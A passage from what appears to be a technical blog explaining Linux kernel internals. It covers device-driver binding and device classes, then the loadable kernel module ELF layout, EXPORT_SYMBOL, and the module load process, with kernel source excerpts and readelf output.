</code></pre></div></div>
<p>If this device has a driver, we just need to call ‘device_bind_driver’ to establish the relation of device and driver.
If this device has no driver, we need to iterate every drivers in ‘dev->bus’ and call __device_attach</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __device_attach(struct device_driver *drv, void *data)
{
struct device *dev = data;
if (!driver_match_device(drv, dev))
return 0;
return driver_probe_device(drv, dev);
}
static inline int driver_match_device(struct device_driver *drv,
struct device *dev)
{
return drv->bus->match ? drv->bus->match(dev, drv) : 1;
}
</code></pre></div></div>
<p>If driver’s bus define a match method, call it. If it return 1, matchs and if return 0, not match.
If the device and the driver matchs, call ‘driver_probe_device’ to bind the device and driver:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int driver_probe_device(struct device_driver *drv, struct device *dev)
{
int ret = 0;
if (!device_is_registered(dev))
return -ENODEV;
pr_debug("bus: '%s': %s: matched device %s with driver %s\n",
drv->bus->name, __func__, dev_name(dev), drv->name);
pm_runtime_barrier(dev);
ret = really_probe(dev, drv);
pm_request_idle(dev);
return ret;
}
static int really_probe(struct device *dev, struct device_driver *drv)
{
int ret = 0;
atomic_inc(&probe_count);
pr_debug("bus: '%s': %s: probing driver %s with device %s\n",
drv->bus->name, __func__, drv->name, dev_name(dev));
WARN_ON(!list_empty(&dev->devres_head));
dev->driver = drv;
/* If using pinctrl, bind pins now before probing */
ret = pinctrl_bind_pins(dev);
if (ret)
goto probe_failed;
if (driver_sysfs_add(dev)) {
printk(KERN_ERR "%s: driver_sysfs_add(%s) failed\n",
__func__, dev_name(dev));
goto probe_failed;
}
if (dev->bus->probe) {
ret = dev->bus->probe(dev);
if (ret)
goto probe_failed;
} else if (drv->probe) {
ret = drv->probe(dev);
if (ret)
goto probe_failed;
}
driver_bound(dev);
ret = 1;
pr_debug("bus: '%s': %s: bound device %s to driver %s\n",
drv->bus->name, __func__, dev_name(dev), drv->name);
。。。
}
</code></pre></div></div>
<p>If the device’s bus define a probe calls it others call athe driver’s probe function.
Finally call ‘driver_bound’ to establish the relations.</p>
<h2 id="driver">driver</h2>
<p>struct device_driver represents a device driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct device_driver {
const char *name;
struct bus_type *bus;
struct module *owner;
const char *mod_name; /* used for built-in modules */
bool suppress_bind_attrs; /* disables bind/unbind via sysfs */
const struct of_device_id *of_match_table;
const struct acpi_device_id *acpi_match_table;
int (*probe) (struct device *dev);
int (*remove) (struct device *dev);
void (*shutdown) (struct device *dev);
int (*suspend) (struct device *dev, pm_message_t state);
int (*resume) (struct device *dev);
const struct attribute_group **groups;
const struct dev_pm_ops *pm;
struct driver_private *p;
};
</code></pre></div></div>
<p>‘driver_find’ is used to find a driver in bus.
‘driver_register’ is used to register a driver to system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int driver_register(struct device_driver *drv)
{
int ret;
struct device_driver *other;
BUG_ON(!drv->bus->p);
if ((drv->bus->probe && drv->probe) ||
(drv->bus->remove && drv->remove) ||
(drv->bus->shutdown && drv->shutdown))
printk(KERN_WARNING "Driver '%s' needs updating - please use "
"bus_type methods\n", drv->name);
other = driver_find(drv->name, drv->bus);
if (other) {
printk(KERN_ERR "Error: Driver '%s' is already registered, "
"aborting...\n", drv->name);
return -EBUSY;
}
ret = bus_add_driver(drv);
if (ret)
return ret;
ret = driver_add_groups(drv, drv->groups);
if (ret) {
bus_remove_driver(drv);
return ret;
}
kobject_uevent(&drv->p->kobj, KOBJ_ADD);
return ret;
}
int bus_add_driver(struct device_driver *drv)
{
struct bus_type *bus;
struct driver_private *priv;
int error = 0;
bus = bus_get(drv->bus);
if (!bus)
return -EINVAL;
pr_debug("bus: '%s': add driver %s\n", bus->name, drv->name);
priv = kzalloc(sizeof(*priv), GFP_KERNEL);
if (!priv) {
error = -ENOMEM;
goto out_put_bus;
}
klist_init(&priv->klist_devices, NULL, NULL);
priv->driver = drv;
drv->p = priv;
priv->kobj.kset = bus->p->drivers_kset;
error = kobject_init_and_add(&priv->kobj, &driver_ktype, NULL,
"%s", drv->name);
if (error)
goto out_unregister;
klist_add_tail(&priv->knode_bus, &bus->p->klist_drivers);
if (drv->bus->p->drivers_autoprobe) {
error = driver_attach(drv);
if (error)
goto out_unregister;
}
module_add_driver(drv->owner, drv);
error = driver_create_file(drv, &driver_attr_uevent);
if (error) {
printk(KERN_ERR "%s: uevent attr (%s) failed\n",
__func__, drv->name);
}
error = driver_add_groups(drv, bus->drv_groups);
if (error) {
/* How the hell do we get out of this pickle? Give up */
printk(KERN_ERR "%s: driver_create_groups(%s) failed\n",
__func__, drv->name);
}
if (!drv->suppress_bind_attrs) {
error = add_bind_files(drv);
if (error) {
/* Ditto */
printk(KERN_ERR "%s: add_bind_files(%s) failed\n",
__func__, drv->name);
}
}
return 0;
out_unregister:
kobject_put(&priv->kobj);
kfree(drv->p);
drv->p = NULL;
out_put_bus:
bus_put(bus);
return error;
}
</code></pre></div></div>
<p>The ‘bus_add_driver’ does the really work, first allocate and initialize a ‘driver_private’ struct.
Later calls ‘driver_attach’, for every device in bus, it calls ‘__driver_attach’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __driver_attach(struct device *dev, void *data)
{
struct device_driver *drv = data;
/*
* Lock device and try to bind to it. We drop the error
* here and always return 0, because we need to keep trying
* to bind to devices and some drivers will return an error
* simply if it didn't support the device.
*
* driver_probe_device() will spit a warning if there
* is an error.
*/
if (!driver_match_device(drv, dev))
return 0;
if (dev->parent) /* Needed for USB */
device_lock(dev->parent);
device_lock(dev);
if (!dev->driver)
driver_probe_device(drv, dev);
device_unlock(dev);
if (dev->parent)
device_unlock(dev->parent);
return 0;
}
</code></pre></div></div>
<p>In ‘__driver_attach’, it calls both ‘driver_match_device’ and ‘driver_probe_device’, the same as ‘__device_attach’.</p>
<p>‘bus_add_driver’ will also create some attribute files.</p>
<h2 id="class">class</h2>
<p>class is a highter abstract of devices, classify the devices according the devices’ functionality.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct class {
const char *name;
struct module *owner;
struct class_attribute *class_attrs;
const struct attribute_group **dev_groups;
struct kobject *dev_kobj;
int (*dev_uevent)(struct device *dev, struct kobj_uevent_env *env);
char *(*devnode)(struct device *dev, umode_t *mode);
void (*class_release)(struct class *class);
void (*dev_release)(struct device *dev);
int (*suspend)(struct device *dev, pm_message_t state);
int (*resume)(struct device *dev);
const struct kobj_ns_type_operations *ns_type;
const void *(*namespace)(struct device *dev);
const struct dev_pm_ops *pm;
struct subsys_private *p;
};
</code></pre></div></div>
<p>‘classes_init’ create a root directory in sysfs.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __init classes_init(void)
{
class_kset = kset_create_and_add("class", NULL, NULL);
if (!class_kset)
return -ENOMEM;
return 0;
}
</code></pre></div></div>
<p>class is created using ‘class_create’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define class_create(owner, name) \
({ \
static struct lock_class_key __key; \
__class_create(owner, name, &__key); \
})
struct class *__class_create(struct module *owner, const char *name,
struct lock_class_key *key)
{
struct class *cls;
int retval;
cls = kzalloc(sizeof(*cls), GFP_KERNEL);
if (!cls) {
retval = -ENOMEM;
goto error;
}
cls->name = name;
cls->owner = owner;
cls->class_release = class_create_release;
retval = __class_register(cls, key);
if (retval)
goto error;
return cls;
error:
kfree(cls);
return ERR_PTR(retval);
}
EXPORT_SYMBOL_GPL(__class_create);
</code></pre></div></div>
<p>Again, ‘__class_register’ does the tough work. It’s most important work is to create a directory in /sys/class.</p>
<p>Let’s see how class impose effects on device create.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct device *device_create(struct class *class, struct device *parent,
dev_t devt, void *drvdata, const char *fmt, ...)
{
va_list vargs;
struct device *dev;
va_start(vargs, fmt);
dev = device_create_vargs(class, parent, devt, drvdata, fmt, vargs);
va_end(vargs);
return dev;
}
static struct device *
device_create_groups_vargs(struct class *class, struct device *parent,
dev_t devt, void *drvdata,
const struct attribute_group **groups,
const char *fmt, va_list args)
{
struct device *dev = NULL;
int retval = -ENODEV;
if (class == NULL || IS_ERR(class))
goto error;
dev = kzalloc(sizeof(*dev), GFP_KERNEL);
if (!dev) {
retval = -ENOMEM;
goto error;
}
dev->devt = devt;
dev->class = class;
dev->parent = parent;
dev->groups = groups;
dev->release = device_create_release;
dev_set_drvdata(dev, drvdata);
retval = kobject_set_name_vargs(&dev->kobj, fmt, args);
if (retval)
goto error;
retval = device_register(dev);
if (retval)
goto error;
return dev;
error:
put_device(dev);
return ERR_PTR(retval);
}
</code></pre></div></div>
<p>Here we see the ‘dev->class’ is set to the class. As we have discussed in ‘device_register’ the class and parent both have an influence in the device’s lying the directory.</p>
Anatomy of the Linux loadable kernel module2018-06-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/02/linux-loadable-module
<p>Loadable module plays a very important role in modern applications and operating systems. Nearly all processes need loadable modules, .so and .dll file for Linux and Windows for example. The operating systems can also benefit from the loadable modules, for examle , the Linux can insert .ko driver file into the kernel when it is running, also the Windows operating has the corresponding mechanism. This article will dig into the anatomy the Linux loadable kernel module. We will use the below very simple loadable kernel module to follow our discuss.</p>
<p>hello.c:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/kernel.h>
#include <linux/module.h>
int testexport(void)
{
printk("in testexport\n");
}
EXPORT_SYMBOL(testexport);
int hello_init(void) {
int i;
printk(KERN_INFO "Hello World!\n");
return 0;
}
void hello_exit(void) {
printk(KERN_INFO "Bye World!\n");
}
module_init(hello_init);
module_exit(hello_exit);
</code></pre></div></div>
<p>Below is the Makefile:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m += hello.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
</code></pre></div></div>
<p>When we compile the kernel module, it generates a hello.ko file. Insert the .ko into the kernel using “insmod hello.ko”, you will see the “Hello World” in dmesg, and remove it using “rmmod hello”, you will see the “Bye World”.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[469345.236572] Hello World!
[469356.544498] Bye World!
</code></pre></div></div>
<h1 id="file-format">File Format</h1>
<p>.ko is an ELF file, which stands for “Executable and Linking Format”, the standand execute file format in Linux.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># file hello.ko
hello.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=28772d0d39be18e530b2b788dbf79acfabf189d6, not strippe
</code></pre></div></div>
<p>Below layout the tpyical .ko file format in disk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>e_shoff +------------------+
+----+ ELF header |
| +------------------+ <------+
| | | |
| | section 1 | |
| | | |
| +------------------+ |
| | section 2 | <---+ |
| +------------------+ | |
| | section 3 | <+ | |
+--> +------------------+ | | |
| section header 1 +--------+
+------------------+ | |
| section header 2 +-----+
+------------------+ | sh_offset
| section header 3 +--+
+------------------+
</code></pre></div></div>
<p>In general, the ELF static file contains three portion, ELF header, several sections and the final several section header talbe. Notice here we omit the optional program header table as the .ko doesn’t use it.</p>
<p>##ELF header</p>
<p>ELF header describes the overall infomation of the file, lies in the first portion of the ELF file. We can use readelf to read the header.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -h hello.ko
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: REL (Relocatable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x0
Start of program headers: 0 (bytes into file)
Start of section headers: 285368 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 0 (bytes)
Number of program headers: 0
Size of section headers: 64 (bytes)
Number of section headers: 33
Section header string table index: 3
</code></pre></div></div>
<p>Use the hexdump we can see the raw data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000000 457f 464c 0102 0001 0000 0000 0000 0000
0000010 0001 003e 0001 0000 0000 0000 0000 0000
0000020 0000 0000 0000 0000 5ab8 0004 0000 0000
0000030 0000 0000 0040 0000 0000 0040 0021 0020
</code></pre></div></div>
<p>Structure represented:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct
{
unsigned char e_ident[16]; /* ELF identification */
Elf64_Half e_type; /* Object file type */
Elf64_Half e_machine; /* Machine type */
Elf64_Word e_version; /* Object file version */
Elf64_Addr e_entry; /* Entry point address */
Elf64_Off e_phoff; /* Program header offset */
Elf64_Off e_shoff; /* Section header offset */
Elf64_Word e_flags; /* Processor-specific flags */
Elf64_Half e_ehsize; /* ELF header size */
Elf64_Half e_phentsize; /* Size of program header entry */
Elf64_Half e_phnum; /* Number of program header entries */
Elf64_Half e_shentsize; /* Size of section header entry */
Elf64_Half e_shnum; /* Number of section header entries */
Elf64_Half e_shstrndx; /* Section name string table index */
} Elf64_Ehdr; The comment describe every filed's meaning.
</code></pre></div></div>
<h2 id="sections">Sections</h2>
<p>Several sections lies after the ELF header. Sections occupies the most space of ELF file. Every section is the true data about the file. For example, the .text section contains the code the program will be executed, the .data contains the data the program will use. There maybe a lot of sections, our this very simple helloworld has 33 sections. When the operating system load the ELF file into the memory, some of the sections will be togethered into a segment, and some sections may be omited, means not load into memory.</p>
<h2 id="section-header-tables">Section header tables</h2>
<p>Section header tables lies in the tail of ELF file. It is the metadata of sections, contains the information about the corresponding section, section start in the ELF file and size for example.</p>
<h1 id="export_symbol-internals">EXPORT_SYMBOL internals</h1>
<p>When we write application in user space, we often use the library functions such as ‘printf’, ‘malloc’ and so on. We don’t need write these functions by ourself as they are provided by the glic library. Also, in kernel space, the kernel module often needs use the kernel’s function to complete his work. For example, the ‘printk’ to print something. For the static linking, the compiler can solve this reference problem, but for the dynamic module load, the kernel should do this by himself, this called resolve the “unresolved reference”. Essentially process “unresolved reference” is to determine the actual address of the kernel module uses. So there must somewhere to export these symbols. In linux kernel, it is done by EXPORT_SYMBOL macro. So let’s look at how to export symbols through EXPORT_SYMBOL.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><include/linux/export.h>
/* For every exported symbol, place a struct in the __ksymtab section */
#define __EXPORT_SYMBOL(sym, sec) \
extern typeof(sym) sym; \
__CRC_SYMBOL(sym, sec) \
static const char __kstrtab_##sym[] \
__attribute__((section("__ksymtab_strings"), aligned(1))) \
= VMLINUX_SYMBOL_STR(sym); \
extern const struct kernel_symbol __ksymtab_##sym; \
__visible const struct kernel_symbol __ksymtab_##sym \
__used \
__attribute__((section("___ksymtab" sec "+" #sym), unused)) \
= { (unsigned long)&sym, __kstrtab_##sym }
#define EXPORT_SYMBOL(sym) \
__EXPORT_SYMBOL(sym, "")
#define EXPORT_SYMBOL_GPL(sym) \
__EXPORT_SYMBOL(sym, "_gpl")
#define EXPORT_SYMBOL_GPL_FUTURE(sym) \
__EXPORT_SYMBOL(sym, "_gpl_future"
</code></pre></div></div>
<p>This shows the EXPORT_SYMBOL definition. Though seems complicated, we will uses our example to instantiate it. Think our EXPORT_SYMBOL(testexport). After expand this macro, we get this(the __CRC_SYMBOL(sym, sec) is left later):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const char __kstrtab_testexport[] = "testexport";
const struct kernel_symbol __ksymtab_testexport =
{(unsigned long)&testexport, __kstrtab_testexport}
The second structure represented:
struct kernel_symbol
{
unsigned long value;
const char *name;
};
</code></pre></div></div>
<p>So here we can see, the EXPORT_SYMBOL just define variables, the ‘value’ is the address of this symbol in memory and ‘name’ is the name of this symbol. Not like ordinary defination, the export function’s name is stored in section “__ksymtab_strings”, and the kernel_symbol variable is stored in section “___ksymtab+testexport”. If you look at the ELF file section, you will not find “___ksymtab+testexport” section. It is converted in “__ksymtab” in <scripts/module-common.lds>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SECTIONS {
/DISCARD/ : { *(.discard) }
__ksymtab : { *(SORT(___ksymtab+*)) }
__ksymtab_gpl : { *(SORT(___ksymtab_gpl+*)) }
__ksymtab_unused : { *(SORT(___ksymtab_unused+*)) }
__ksymtab_unused_gpl : { *(SORT(___ksymtab_unused_gpl+*)) }
__ksymtab_gpl_future : { *(SORT(___ksymtab_gpl_future+*)) }
__kcrctab : { *(SORT(___kcrctab+*)) }
__kcrctab_gpl : { *(SORT(___kcrctab_gpl+*)) }
__kcrctab_unused : { *(SORT(___kcrctab_unused+*)) }
__kcrctab_unused_gpl : { *(SORT(___kcrctab_unused_gpl+*)) }
__kcrctab_gpl_future : { *(SORT(___kcrctab_gpl_future+*)) }
}
</code></pre></div></div>
<p>As for EXPORT_SYMBOL_GPL and EXPORT_SYMBOL_GPL_FUTURE, the only difference is the section added by “_gpl” and “_gpl_future”.
In order to let the kernel uses these sections to find the exported symbol, the linker must export the address of these section. See <include/asm-generic/vmlinux.lds.h>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Kernel symbol table: Normal symbols */ \
__ksymtab : AT(ADDR(__ksymtab) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab) = .; \
*(SORT(___ksymtab+*)) \
VMLINUX_SYMBOL(__stop___ksymtab) = .; \
} \
\
/* Kernel symbol table: GPL-only symbols */ \
__ksymtab_gpl : AT(ADDR(__ksymtab_gpl) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab_gpl) = .; \
*(SORT(___ksymtab_gpl+*)) \
VMLINUX_SYMBOL(__stop___ksymtab_gpl) = .; \
} \
\
/* Kernel symbol table: Normal unused symbols */ \
__ksymtab_unused : AT(ADDR(__ksymtab_unused) - LOAD_OFFSET) { \
VMLINUX_SYMBOL(__start___ksymtab_unused) = .; \
*(SORT(___ksymtab_unused+*)) \
VMLINUX_SYMBOL(__stop___ksymtab_unused) = .; \
} \
...
</code></pre></div></div>
<p>In <kernel/module.c> we can see the declaration:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Provided by the linker */
extern const struct kernel_symbol __start___ksymtab[];
extern const struct kernel_symbol __stop___ksymtab[];
extern const struct kernel_symbol __start___ksymtab_gpl[];
extern const struct kernel_symbol __stop___ksymtab_gpl[];
extern const struct kernel_symbol __start___ksymtab_gpl_future[];
extern const struct kernel_symbol __stop___ksymtab_gpl_future[];
</code></pre></div></div>
<p>So after this, the kernel can use ‘__start___ksymtab’ and other variables without any errorsNow let’s talk more about the ELF file about section “__ksymtab”. Firstly dump this section:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf --hex-dump=_ksymtab hello.ko
readelf: Warning: Section '_ksymtab' was not dumped because it does not exist!
# readelf --hex-dump=__ksymtab hello.ko
Hex dump of section '__ksymtab':
NOTE: This section has relocations against it, but these have NOT been applied to this dump.
0x00000000 00000000 00000000 00000000 00000000 ................
</code></pre></div></div>
<p>Interesting, they are all zeros! Where is our data.
If you look the section headers more carefully, you can see some sections begin with “.rela”.
There is a ‘.rela__ksymtab’ section:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -S hello.ko
There are 33 section headers, starting at offset 0x45ab8:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .note.gnu.build-i NOTE 0000000000000000 00000040
0000000000000024 0000000000000000 A 0 0 4
[ 2] .text PROGBITS 0000000000000000 00000070
0000000000000051 0000000000000000 AX 0 0 16
[ 3] .rela.text RELA 0000000000000000 00025be8
00000000000000d8 0000000000000018 I 30 2 8
[ 4] __ksymtab PROGBITS 0000000000000000 000000d0
0000000000000010 0000000000000000 A 0 0 16
[ 5] .rela__ksymtab RELA 0000000000000000 00025cc0
0000000000000030 0000000000000018 I 30 4 8
[ 6] __kcrctab PROGBITS 0000000000000000 000000e0
0000000000000008 0000000000000000 A 0 0 8
[ 7] .rela__kcrctab RELA 0000000000000000 00025cf0
</code></pre></div></div>
<p>‘.rela__ksymtab’ section’s type is RELA. This means this section contains relocation data which data will be and how to be modified when the final executable is loaded to kernel. section of ‘.rela__ksymtab’ contains the ‘__ksymtab’ relocation data.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># readelf -r hello.ko | head -20
Relocation section '.rela.text' at offset 0x25be8 contains 9 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000000001 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000008 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + 0
00000000000d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
000000000021 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000028 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + f
00000000002d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
000000000041 001f00000002 R_X86_64_PC32 0000000000000000 __fentry__ - 4
000000000048 00050000000b R_X86_64_32S 0000000000000000 .rodata.str1.1 + 1f
00000000004d 002400000002 R_X86_64_PC32 0000000000000000 printk - 4
Relocation section '.rela__ksymtab' at offset 0x25cc0 contains 2 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000000000 002300000001 R_X86_64_64 0000000000000000 testexport + 0
000000000008 000600000001 R_X86_64_64 0000000000000000 __ksymtab_strings + 0
Relocation section '.rela__kcrctab' at offset 0x25cf0 contains 1 entries:
Offset Info Type Sym. Value Sym. Name + Addend
</code></pre></div></div>
<p>Here we can see in section ‘.rela__ksymtab’ there is 2 entries. I will not dig into the RELA section format, just notice the 0x23 and 0x06 is used to index the .symtab section. So when the .ko is loaded into the kernel, the first 8 bytes of section ‘__ksymtab’ will be replaced by the actual address of testexport, and the second 8 bytes of section ‘__ksymtab’ will be replaced by the actual address of the string at ‘__ksymtab_strings+0’ which is ‘testexport’. So this is what the structure kernel_symbol—through EXPORT_SYMBOL—does.</p>
<h1 id="module-load-process">Module load process</h1>
<p>init_module system call is used to load the kernel module to kernel. User space application loads the .ko file into user space and then pass the address and size of .ko and the arguments of the kernel module will use to this system call. In init_module, it just allocates the memory space and copys the user’s data to kernel, then call the actual work function load_module. In general we can split the load_module function up to two logical part. The first part completes the load work such as reallocation the memory to hold kernel module, resolve the symbol, apply relocations and so on. The second part later do other work such as call the module’s init function, cleanup the allocated resource and so on. Before we go to the first part, let’s first look at a very important structure ‘struct module’:
<include/linux/module.h></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct module {
enum module_state state;
/* Member of list of modules */
struct list_head list;
/* Unique handle for this module */
char name[MODULE_NAME_LEN];
/* Sysfs stuff. */
struct module_kobject mkobj;
struct module_attribute *modinfo_attrs;
const char *version;
const char *srcversion;
struct kobject *holders_dir;
/* Exported symbols */
const struct kernel_symbol *syms;
const unsigned long *crcs;
unsigned int num_syms;
/* Kernel parameters. */
struct kernel_param *kp;
unsigned int num_kp;
...
}
</code></pre></div></div>
<p>Here I just list some of the fields of ‘struct module’, it represents a module in kernel, contains the infomation of the kernel module. For example, ‘state’ indicates the status of the module, it will change with the load process, the ‘list’ links all of the modules in kernel and ‘name’ contains the module name.
Below lists some important function the load_module calls.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>load_module
-->layout_and_allocate
-->setup_load_info
-->rewrite_section_headers
-->layout_sections
-->layout_symtab
-->move_module
-->find_module_sections
-->simplify_symbols
-->apply_relocations
-->parse_args
-->do_init_module
</code></pre></div></div>
<p>The rewrite_section_headers function replace the sections header field ‘sh_addr’ with the real address in the memory. Then in function setup_load_info, ‘mod’ is initialized with the “.gnu.linkonce.this_module” section’s real address. Actually, this contains the data compiler setup for us. In the source directory, we can see a hello.mod.c file:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
</code></pre></div></div>
<p>So here we can see the ‘mod’ will have some field. The interesting here is that we can see the init function is init_module, not the same as our hello_init. The magic is caused by module_init
as follows(include/linux/init.h):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Each module must use one module_init(). */
#define module_init(initfn) \
static inline initcall_t __inittest(void) \
{ return initfn; } \
int init_module(void) __attribute__((alias(#initfn)));
</code></pre></div></div>
<p>From here we can see the compiler will set the ‘init_module’s alias to our init function name which is ‘hello_init’ in our example.
Next in the function ‘layout_sections’, it will caculate the ‘core’ size and ‘init’ size of the ELF file. Then according where define the CONFIG_KALLSYMS, ‘layout_symtab’ will be called and the symbol info will be added to the core section.
After caculate the core and init section, it will allocate space for core and init section in function ‘move_module’ and then copy the origin section data to the new space. So the sections’s sh_addr should also be updated. Then the ‘mod’s address should be updated.</p>
<p>mod = (void *)info->sechdrs[info->index.mod].sh_addr;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> core section
+------------+ <-----mod->module_core
+-> | |
| +------------+
+------------+ +---> | |
| ELF header | | | +------------+
+------------+ | | | |
| section 0 +---+ +------------+
+------------+ |
| section 1 +----+
+------------+ | | init section
| section 2 +----+ +------------+ <-----mod->module_init
+------------+ | +-> | |
| section 3 +-+ | +------------+
+------------+ +-> | ||
|sec head table +------------+
+------------+ | |
| |
+------------+
</code></pre></div></div>
<p>So for now , we have this section.</p>
<p>Later ‘load_module’ call ‘find_module_sections’ to get the export symbol.
Next, it calls ‘simplify_symbols’ to fix up the symbols. The function call chain is
simplify_symbols–>resolve_symbol_wait–>
–>resolve_symbol–>find_symbol–>each_symbol_section
In the last function, it will first iterate the kernel’s export symbol and then iterate the loaded modules symbol.
If ‘resolve_symbol’ successful, it will call ‘ref_module’ to establish the dependency between current load module and the module of the symbol it uses. This is done in ‘add_module_usage’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int add_module_usage(struct module *a, struct module *b)
{
struct module_use *use;
pr_debug("Allocating new usage for %s.\n", a->name);
use = kmalloc(sizeof(*use), GFP_ATOMIC);
if (!use) {
pr_warn("%s: out of memory loading\n", a->name);
return -ENOMEM;
}
use->source = a;
use->target = b;
list_add(&use->source_list, &b->source_list);
list_add(&use->target_list, &a->target_list);
return 0;
}
</code></pre></div></div>
<p>Here a is current loading module, and b is the module a uses its symbol.
module->source_list links the modules depend on module, and module->target_list links the modules it depends on.</p>
<p>After fix up the symbols, the ‘load_module’ function will do relocation by calling function ‘apply_relocations’. If the section’s type is ‘SHT_REL’ or ‘SHT_RELA’, function ‘apply_relocations’ will call the arch-spec function. As the symbol table has been solved, this relocation is much simple. So now the module’s export symbol address has been corrected the right value.</p>
<p>Next the ‘load_module’ function will call ‘parse_args’ to parse module parameters. Let’s first look at how to define parameter in kernel module.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static bool __read_mostly fasteoi = 1;
module_param(fasteoi, bool, S_IRUGO);
#define module_param(name, type, perm) \
module_param_named(name, name, type, perm)
#define module_param_named(name, value, type, perm) \
param_check_##type(name, &(value)); \
module_param_cb(name, &param_ops_##type, &value, perm); \
__MODULE_PARM_TYPE(name, #type)
#define module_param_cb(name, ops, arg, perm) \
__module_param_call(MODULE_PARAM_PREFIX, name, ops, arg, perm, -1, 0)
#define __module_param_call(prefix, name, ops, arg, perm, level, flags) \
/* Default value instead of permissions? */ \
static const char __param_str_##name[] = prefix #name; \
static struct kernel_param __moduleparam_const __param_##name \
__used \
__attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
= { __param_str_##name, ops, VERIFY_OCTAL_PERMISSIONS(perm), \
level, flags, { arg } }
</code></pre></div></div>
<p>Let’s try an example using the ‘fasteoi’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>param_check_bool(fasteoi, &(fasteoi));
static const char __param_str_bool[] = "fasteoi";
static struct kernel_param __moduleparam_const __param_fasteoi \
__used
__attribute__ ((unused,__section__ ("__param"),aligned(sizeof(void *)))) \
= { __param_str_fasteoi, param_ops_bool, VERIFY_OCTAL_PERMISSIONS(perm), \
-1, 0, { &fasteoi} }
</code></pre></div></div>
<p>So here we can see ‘module_param(fasteoi, bool, S_IRUGO);’ define a variable which is ‘struct kernel_param’ and store it in section ‘__param’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kernel_param {
const char *name;
const struct kernel_param_ops *ops;
u16 perm;
s8 level;
u8 flags;
union {
void *arg;
const struct kparam_string *str;
const struct kparam_array *arr;
};
};
</code></pre></div></div>
<p>the union ‘arg’ will contain the kernel parameter’s address.</p>
<p>The user space will pass the specific arguments to load_module in the ‘uargs’ argument.
In ‘parse_args’, it will pass one by one parameter, and compare it will the data in section ‘__param’ , and then write it will the user specific value.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int param_set_bool(const char *val, const struct kernel_param *kp)
{
/* No equals means "set"... */
if (!val) val = "1";
